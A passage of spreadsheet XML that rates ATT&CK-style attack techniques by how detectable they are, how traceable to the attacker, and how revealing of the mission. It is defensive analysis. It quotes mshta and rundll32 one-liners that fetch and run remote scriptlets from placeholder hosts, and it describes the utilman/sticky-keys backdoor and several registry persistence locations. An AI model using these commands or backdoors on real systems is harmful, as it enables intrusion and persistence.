    <s v="Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:_x000a_Manipulation of development tools_x000a_Manipulation of a development environment_x000a_Manipulation of source code repositories (public or private)_x000a_Manipulation of software update/distribution mechanisms_x000a_Compromised/infected system images (multiple cases of removable media infected at the factory)_x000a_Replacement of legitimate software with modified versions_x000a_Sales of modified/counterfeit products to legitimate distributors_x000a_Shipment interdiction_x000a_While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.111213 Targeting may be specific to a desired victim set14 or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims."/>
    <n v="2"/>
    <s v="Integrity scanning and detect unusual behavior"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Trusted Relationship"/>
    <x v="1"/>
    <x v="4"/>
    <s v="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 used by the other party for access to internal network systems may be compromised and used."/>
    <n v="1"/>
    <s v="Uncommon data flows"/>
    <n v="1"/>
    <s v="Stepping stone party may be indicative"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Valid Accounts"/>
    <x v="1"/>
    <x v="4"/>
    <s v="Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access._x000a_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_x000a__x000a_Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful._x000a__x000a_The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise."/>
    <n v="3"/>
    <s v="Monitoring for unusual usage of the accounts"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="CMSTP"/>
    <x v="2"/>
    <x v="5"/>
    <s v="The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.1 CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections._x000a__x000a_Adversaries may supply CMSTP.exe with INF files infected with malicious commands.2 Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs3 and/or COM scriptlets (SCT) from remote servers.45 This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application._x000a__x000a_CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface"/>
    <n v="1"/>
    <s v="Very hard to detect, inf files may reside"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Control Panel Items"/>
    <x v="2"/>
    <x v="5"/>
    <s v="Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.12 Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.123_x000a__x000a_For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.1_x000a__x000a_Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via Spearphishing Attachment campaigns 23 or executed as part of multi-stage malware.4 Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting."/>
    <n v="1"/>
    <s v="Disk is altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Dynamic Data Exchange"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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_x000a__x000a_Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.123_x000a__x000a_Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands45, directly or through embedded files6, and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.7 DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution."/>
    <n v="3"/>
    <s v="Scanning for DDEAUTO and unusual processes with Office as parent"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Execution through Module Load"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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1_x000a__x000a_The module loader can load DLLs:_x000a__x000a_via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;_x000a_via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);_x000a_via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;_x000a_via &lt;file name=&quot;filename.extension&quot; loadFrom=&quot;fully-qualified or relative pathname&quot;&gt; in an embedded or external &quot;application manifest&quot;. The file name refers to an entry in the IMPORT directory or a forwarded EXPORT._x000a_Adversaries can use this functionality as a way to execute arbitrary code on a system."/>
    <n v="1"/>
    <s v="Very hard to detect due to the high amount of false positives"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Exploitation for Client Execution"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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_x000a__x000a_Several types exist"/>
    <n v="2"/>
    <s v="Detectable due to IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Graphical User Interface"/>
    <x v="2"/>
    <x v="5"/>
    <s v="Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol."/>
    <n v="4"/>
    <s v="Gui manipulations may be visible for good observers"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="InstallUtil"/>
    <x v="2"/>
    <x v="5"/>
    <s v="InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.1 InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe. InstallUtil.exe is digitally signed by Microsoft._x000a__x000a_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
    <n v="2"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="LSASS Driver"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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1_x000a__x000a_Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations."/>
    <n v="2"/>
    <s v="System events and modules loaded"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Mshta"/>
    <x v="2"/>
    <x v="5"/>
    <s v="Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta.1 HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.2_x000a__x000a_Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code34567_x000a__x000a_Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(&quot;GetObject(&quot;&quot;script:https[:]//webserver/payload[.]sct&quot;&quot;)&quot;))_x000a__x000a_They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta_x000a__x000a_Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings."/>
    <n v="2"/>
    <s v="Process monitoring"/>
    <n v="3"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="1"/>
    <s v="Attacker server may hint towards mission's target"/>
  </r>
  <r>
    <s v="PowerShell"/>
    <x v="2"/>
    <x v="5"/>
    <s v="PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.1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_x000a__x000a_PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk._x000a__x000a_Administrator permissions are required to use PowerShell to connect to remote systems._x000a__x000a_A number of PowerShell-based offensive testing tools are available, including Empire,2 PowerSploit,3 and PSAttack"/>
    <n v="2"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Regsvcs/Regasm"/>
    <x v="2"/>
    <x v="5"/>
    <s v="Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.12_x000a__x000a_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
    <n v="1"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Regsvr32"/>
    <x v="2"/>
    <x v="5"/>
    <s v="Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.1_x000a__x000a_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_x000a__x000a_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2 This variation of the technique is often referred to as a &quot;Squiblydoo&quot; attack and has been used in campaigns targeting governments.34_x000a__x000a_Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking."/>
    <n v="2"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Rundll32"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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_x000a__x000a_Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.1_x000a__x000a_Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https[:]//www[.]example[.]com/malicious.sct&quot;)&quot; This behavior has been seen used by malware such as Poweliks"/>
    <n v="2"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Scheduled Task"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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1_x000a__x000a_An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account."/>
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Scripting"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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_x000a__x000a_Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macos being allowed or that the user will accept to activate them._x000a__x000a_Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit1, Veil2, and PowerSploit3 are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell."/>
    <n v="3"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Service Execution"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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
    <n v="1"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Signed Binary Proxy Execution"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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n v="3"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Third-party Software"/>
    <x v="2"/>
    <x v="5"/>
    <s v="Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code._x000a__x000a_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_x000a__x000a_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n v="3"/>
    <s v="Uncommon software may indicate"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Trap"/>
    <x v="2"/>
    <x v="5"/>
    <s v="The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where &quot;command list&quot; will be executed when &quot;signals&quot; are received."/>
    <n v="1"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Trusted Developer Utilities"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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_x000a__x000a_MSBuild_x000a_MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.1_x000a__x000a_Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.2 MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.3_x000a__x000a_DNX_x000a_The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016.4 DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft._x000a__x000a_An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX.5_x000a__x000a_RCSI_x000a_The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution.6 The rcsi.exe binary is signed by Microsoft.7_x000a__x000a_C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe.7_x000a__x000a_WinDbg/CDB_x000a_WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools.8 They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft._x000a__x000a_An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities.9_x000a__x000a_It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft._x000a__x000a_Tracker_x000a_The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system.10_x000a__x000a_An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions"/>
    <n v="2"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="User Execution"/>
    <x v="2"/>
    <x v="5"/>
    <s v="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
    <n v="4"/>
    <s v="User is required to take actions"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Windows Management Instrumentation"/>
    <x v="2"/>
    <x v="5"/>
    <s v="Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB)1 and Remote Procedure Call Service (RPCS)2 for remote access. RPCS operates over port 135.3_x000a__x000a_An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement."/>
    <n v="3"/>
    <s v="WMI traffic can be identified"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Technique may contain mission details"/>
  </r>
  <r>
    <s v="Windows Remote Management"/>
    <x v="2"/>
    <x v="5"/>
    <s v="Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).1 It may be called with the winrm command or by any number of programs such as PowerShell."/>
    <n v="3"/>
    <s v="Monitor WinRM usage"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Technique may contain mission details"/>
  </r>
  <r>
    <s v="Accessibility Features"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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_x000a__x000a_Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as &quot;sticky keys&quot;, and has been used by adversaries for unauthenticated access through a remote desktop login screen.1_x000a__x000a_Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP).2 The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:_x000a__x000a_For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with &quot;cmd.exe&quot; (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges.3_x000a__x000a_For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures &quot;cmd.exe,&quot; or another program that provides backdoor access, as a &quot;debugger&quot; for the accessibility program (e.g., &quot;utilman.exe&quot;). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the &quot;debugger&quot; program to be executed with SYSTEM privileges.3_x000a__x000a_Other accessibility features exist that may also be leveraged in a similar fashion:2_x000a__x000a_On-Screen Keyboard: C:\Windows\System32\osk.exe_x000a_Magnifier: C:\Windows\System32\Magnify.exe_x000a_Narrator: C:\Windows\System32\Narrator.exe_x000a_Display Switcher: C:\Windows\System32\DisplaySwitch.exe_x000a_App Switcher: C:\Windows\System32\AtBroker.exe"/>
    <n v="3"/>
    <s v="Unusual RDP sessions may give it away. Manipulated binaries as well"/>
    <n v="3"/>
    <s v="If public RDP server is used, connection may be traced to attacker"/>
    <n v="2"/>
    <s v="Target RDP server may hint towards mission's target"/>
  </r>
  <r>
    <s v="AppCert DLLs"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions:1_x000a__x000a_CreateProcess_x000a_CreateProcessAsUser_x000a_CreateProcessWithLoginW_x000a_CreateProcessWithTokenW_x000a_WinExec_x000a_Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer."/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="AppInit DLLs"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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1 Similar to Process Injection, these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.2_x000a__x000a_The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled."/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Application Shimming"/>
    <x v="3"/>
    <x v="6"/>
    <s v="The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow backward compatibility of programs as Windows updates and changes its code. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.1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_x000a__x000a_%WINDIR%\AppPatch\sysmain.sdb_x000a_hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb_x000a_Custom databases are stored in:_x000a__x000a_%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom_x000a_hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom_x000a_To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to Hooking, utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc."/>
    <n v="3"/>
    <s v="Very visible for system admins"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Authentication Package"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.1_x000a__x000a_Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of &quot;Authentication Packages&quot;=&lt;target binary&gt;. The binary will then be executed by the system when the authentication packages are loaded."/>
    <n v="3"/>
    <s v="Registry setting monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="BITS Jobs"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)1.2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_x000a__x000a_The interface to create and manage BITS jobs is accessible through PowerShell 2 and the BITSAdmin tool.3_x000a__x000a_Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.456 BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).74_x000a__x000a_BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol."/>
    <n v="3"/>
    <s v="Standard tooling is used, which may lead to logs/audit trails"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Bootkit"/>
    <x v="3"/>
    <x v="6"/>
    <s v="A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).1_x000a__x000a_Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly."/>
    <n v="1"/>
    <s v="Disk is altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Browser Extensions"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.12_x000a__x000a_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3 Once the extension is installed, it can browse to websites in the background,45 steal all information that a user enters into a browser, to include credentials,67 and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions.8 There have also been similar examples of extensions being used for command &amp; control "/>
    <n v="4"/>
    <s v="Must be installed actively"/>
    <n v="3"/>
    <s v="Extension must be loaded from a source that can be traced"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Change Default File Association"/>
    <x v="3"/>
    <x v="6"/>
    <s v="When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access.12 Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened._x000a__x000a_System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example:_x000a__x000a_HKEY_CLASSES_ROOT\txtfile\shell\open\command_x000a_HKEY_CLASSES_ROOT\txtfile\shell\print\command_x000a_HKEY_CLASSES_ROOT\txtfile\shell\printto\command_x000a_The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands."/>
    <n v="4"/>
    <s v="OS usage is changed"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Component Firmware"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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
    <n v="1"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Component Object Model Hijacking"/>
    <x v="3"/>
    <x v="6"/>
    <s v="The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.1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2 An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection."/>
    <n v="2"/>
    <s v="Disk and registry altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Create Account"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system._x000a__x000a_The net user commands can be used to create a local or domain account."/>
    <n v="3"/>
    <s v="Disk and SAM are altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="DLL Search Order Hijacking"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Windows systems use a common method to look for required DLLs to load into a program.1 Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence._x000a__x000a_Adversaries may perform DLL preloading, also called binary planting attacks,2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3 Adversaries may use this behavior to cause the program to load a malicious DLL._x000a__x000a_Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation.456_x000a__x000a_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_x000a__x000a_Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace."/>
    <n v="3"/>
    <s v="Altering of system configuration"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="External Remote Services"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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_x000a__x000a_Adversaries may use remote services to access and persist within a network.1 Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of Redundant Access during an operation."/>
    <n v="2"/>
    <s v="Monitoring for unexpected VPN and remote access tools can detect this."/>
    <n v="2"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="File System Permissions Weakness"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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n v="2"/>
    <s v="Unusual binaries may occur in memory and on disk"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Hooking"/>
    <x v="3"/>
    <x v="6"/>
